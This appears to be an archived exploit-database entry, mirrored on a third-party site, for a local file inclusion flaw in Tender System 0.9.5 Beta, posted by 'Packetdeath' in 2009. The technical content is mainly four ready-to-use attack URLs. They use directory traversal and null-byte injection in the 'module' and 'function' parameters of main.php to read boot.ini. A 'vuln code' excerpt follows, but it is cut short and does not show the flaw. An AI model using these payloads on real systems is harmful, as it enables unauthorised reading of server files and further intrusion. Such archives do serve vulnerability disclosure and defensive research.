[] NeoSense
E X P L O I T S
title author type platform port cve id

Tender System 0.9.5b - Local File Inclusion

Author: Packetdeath
type: webapps
platform: php
port: 
date_added: 2009-12-13 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comtendersystem_beta_0_9_5.zip
  __________                __           __      .___             __  .__
  \______   \_____    ____ |  | __ _____/  |_  __| _/____ _____ _/  |_|  |__
   |     ___/\__  \ _/ ___\|  |/ // __ \   __\/ __ |/ __ \\__  \\   __\  |  \
   |    |     / __ \\  \___|    <\  ___/|  | / /_/ \  ___/ / __ \|  | |   Y  \
   |____|    (____  /\___  >__|_ \\___  >__| \____ |\___  >____  /__| |___|  /
                  \/     \/     \/    \/          \/    \/     \/          \/

-------------------------------------------------------------------------------------------
Note: TESTED LOCALLY WITH XAMPP FOR WINDOWS
I was unable to get this to work on a Linux server. Further testing may be required.
 ------------------------------------------------------------------------------------------
Target: TenderSystem
Version: 0.9.5 Beta
Site  http://www.tendersystem.com/
Demo: http://demo.tendersystem.com/
Date: 2-14-2009
-------------------------------------------------------------------------------------------
Author: Packetdeath
Homepage: www.ssteam.ws
Contact: yaii_abc@hotmail.com
-------------------------------------------------------------------------------------------
Greetz: bi0, AnnexxEmpire and the rest of SSTeam.ws
-------------------------------------------------------------------------------------------

Exploit:
http://127.0.0.1/tendersystem/main.php?module=../../../../../../../../boot.ini%00.html&function=login



http://127.0.0.1/tendersystem/main.php?module=../../../../../../../../boot.ini%00.jpg&function=login



http://127.0.0.1/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.html


http://127.0.0.1/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.jpg
-------------------------------------------------------------------------------------------------------
Vuln code in main.php:

// load required files
require('modules/generic/ts_main.php');
?>
-------------------------------------------------------------------------------------------------------

Some things are better left unsaid <3
... That is all.

/Packetdeath
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.